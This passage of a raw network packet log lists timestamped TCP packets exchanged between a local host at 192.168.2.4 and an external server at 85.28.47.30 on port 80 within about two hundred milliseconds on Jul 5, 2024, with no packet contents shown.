                                                                Jul 5, 2024 04:36:06.733668089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733692884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733705044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733705044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733724117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733736038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733746052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733747005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733761072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733762980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733774900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733791113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733803034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733937979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733956099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733968019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733978987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733978987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.733993053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.733999014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734004974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734011889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734016895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734030008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734030962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734041929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734047890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734055042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734057903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734067917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734072924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734081030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734091997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734091997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734106064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734112024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734121084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734132051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734138966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734153986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734339952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734350920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734361887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734373093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734378099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734385014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734395981 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734396935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734410048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734421015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734425068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734432936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734438896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734446049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734458923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734461069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734471083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734481096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734484911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734493017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734497070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734509945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734517097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734541893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734541893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734623909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734635115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734646082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734658957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734661102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734671116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734679937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734687090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734694004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734703064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734715939 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734715939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734724045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734729052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734740973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734745979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734756947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734760046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.734777927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.734805107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.823515892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823539972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823549986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823596954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.823600054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823611021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823621035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823632002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823632002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.823658943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.823683977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.823968887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823988914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.823997974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824038982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824045897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824057102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824067116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824078083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824100018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824114084 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824194908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824206114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824249029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824352980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824362993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824372053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824382067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824393988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824404955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824409962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824415922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824424982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824430943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824440956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824453115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824457884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824470043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824476957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824485064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824496031 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824502945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824506998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824521065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824526072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824532032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824542999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824549913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824553967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824567080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824574947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824580908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824598074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824605942 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824615955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824628115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824639082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824640036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824660063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824678898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824814081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824831009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824843884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824853897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824898958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824907064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824913979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824923992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824934006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824944019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824954033 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.824968100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.824995995 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825299025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825309992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825319052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825354099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825359106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825366974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825402975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825434923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825444937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825490952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825495005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825506926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825541019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825640917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825653076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825661898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825670958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825695038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825706959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825814009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825826883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825836897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825849056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.825865030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.825881004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826020002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826036930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826056004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826066971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826069117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826078892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826091051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826103926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826119900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826217890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826237917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826253891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826266050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826271057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826277971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826289892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826294899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826302052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826312065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826322079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826328039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826340914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826348066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826359987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826360941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826370955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826384068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826390982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826394081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826407909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826411009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826420069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826432943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826435089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826447010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826453924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826458931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826471090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826483011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826483965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826498032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826509953 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826529026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826529980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826550961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826555014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826565027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826570988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826577902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826586962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826594114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826608896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826627016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826641083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.826787949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826836109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826848984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.826886892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827004910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827017069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827027082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827039957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827050924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827058077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827063084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827075958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827076912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827088118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827100039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827100992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827114105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827120066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827131987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827140093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827142954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827161074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827163935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827176094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827195883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827208042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827214956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827219009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827234030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827241898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827246904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.827265978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.827291965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.915364981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915421009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915431023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915436029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.915441990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915467024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.915477037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915488005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915494919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.915498018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915513039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.915527105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.915553093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916016102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916027069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916037083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916069984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916088104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916117907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916129112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916140079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916151047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916169882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916193962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916204929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916215897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916224957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916235924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916248083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916254044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916261911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916264057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916282892 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916292906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916304111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916313887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916320086 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916332006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916344881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916358948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916409016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916419983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916429996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916440964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916452885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916477919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916484118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916493893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916506052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916536093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916541100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916548967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916559935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916574955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916584015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916589022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916600943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916624069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916626930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916639090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916673899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916737080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916749001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916759014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916770935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916780949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:06.916791916 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916804075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.916821957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:06.917143106 CEST804973085.28.47.30192.168.2.4
